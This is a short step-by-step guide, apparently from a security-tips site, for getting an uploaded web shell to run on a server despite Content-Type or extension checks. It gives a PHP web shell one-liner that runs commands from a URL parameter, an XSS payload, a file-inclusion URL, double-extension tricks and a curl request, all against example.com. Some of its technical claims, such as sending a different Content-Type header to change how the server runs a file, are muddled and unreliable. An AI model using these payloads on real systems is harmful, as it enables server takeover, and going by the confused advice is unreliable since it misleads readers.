Bypass Text/Plain Content Type

TL;DR

Some servers incorrectly block files based on their Content-Type header (e.g., text/plain) even if the file content itself is executable code like PHP or JavaScript. This guide shows how to bypass this restriction by manipulating the request and server response.

Solution

1. Understand the Problem: Servers sometimes rely too heavily on Content-Type headers instead of actually examining file content. If a server sees text/plain, it might refuse to execute the file, even if it’s valid PHP or JavaScript.
   • This is often a security measure gone wrong – it’s easy to circumvent and doesn’t reliably protect against malicious uploads.
2. Attempt Direct Execution (First Try): Before trying anything complex, simply try accessing the uploaded file directly in your browser.
   • If this works, you’re lucky! The server might not be enforcing the Content-Type restriction as strictly.
3. Manipulate the Request with a Different Extension: Try changing the file extension in the URL.
   • If your uploaded file is named shell.txt, try accessing it as shell.php or shell.js. The server might ignore the original extension and execute based on the new one.
   • Example: If you upload shell.txt containing PHP code, try

     http://example.com/uploads/shell.php

     .

4. Use a Different Content-Type Header (Client-Side): You can attempt to trick the server by sending a different Content-Type header with your request.
   • This is best done using tools like curl or browser developer tools.
   • Using curl:

     curl -H "Content-Type: application/php" http://example.com/uploads/shell.txt

     (Replace application/php with the appropriate MIME type for your file content, e.g., application/javascript).

5. Exploit Server-Side Parsing Vulnerabilities: Some servers may have vulnerabilities in how they parse files.
   • PHP Code Injection (if the server parses PHP): If the server is configured to parse PHP code within HTML or other file types, you might be able to inject PHP code directly into your text/plain file. For example, if the server allows PHP tags in .html files, you could upload a file like:

     <?php system($_GET['cmd']); ?>

     and access it as

     http://example.com/uploads/shell.html?cmd=whoami

     .

   • JavaScript Injection (if the server executes JavaScript): Similar to PHP, if the server allows JavaScript execution in HTML or other file types, you can inject JavaScript code.

     <script>alert('XSS');</script>

6. File Inclusion Vulnerabilities (if applicable): If the server has a file inclusion vulnerability, you might be able to include your text/plain file as part of another script.
   • Example: If there’s a vulnerable parameter like file= in a URL:

     http://example.com/index.php?file=/uploads/shell.txt

7. Double Extension Bypass (if the server only checks the last extension): Some servers only check the final file extension.
   • Upload a file named shell.txt.php or shell.php.txt. The server might execute it as PHP if it sees the .php extension at the end.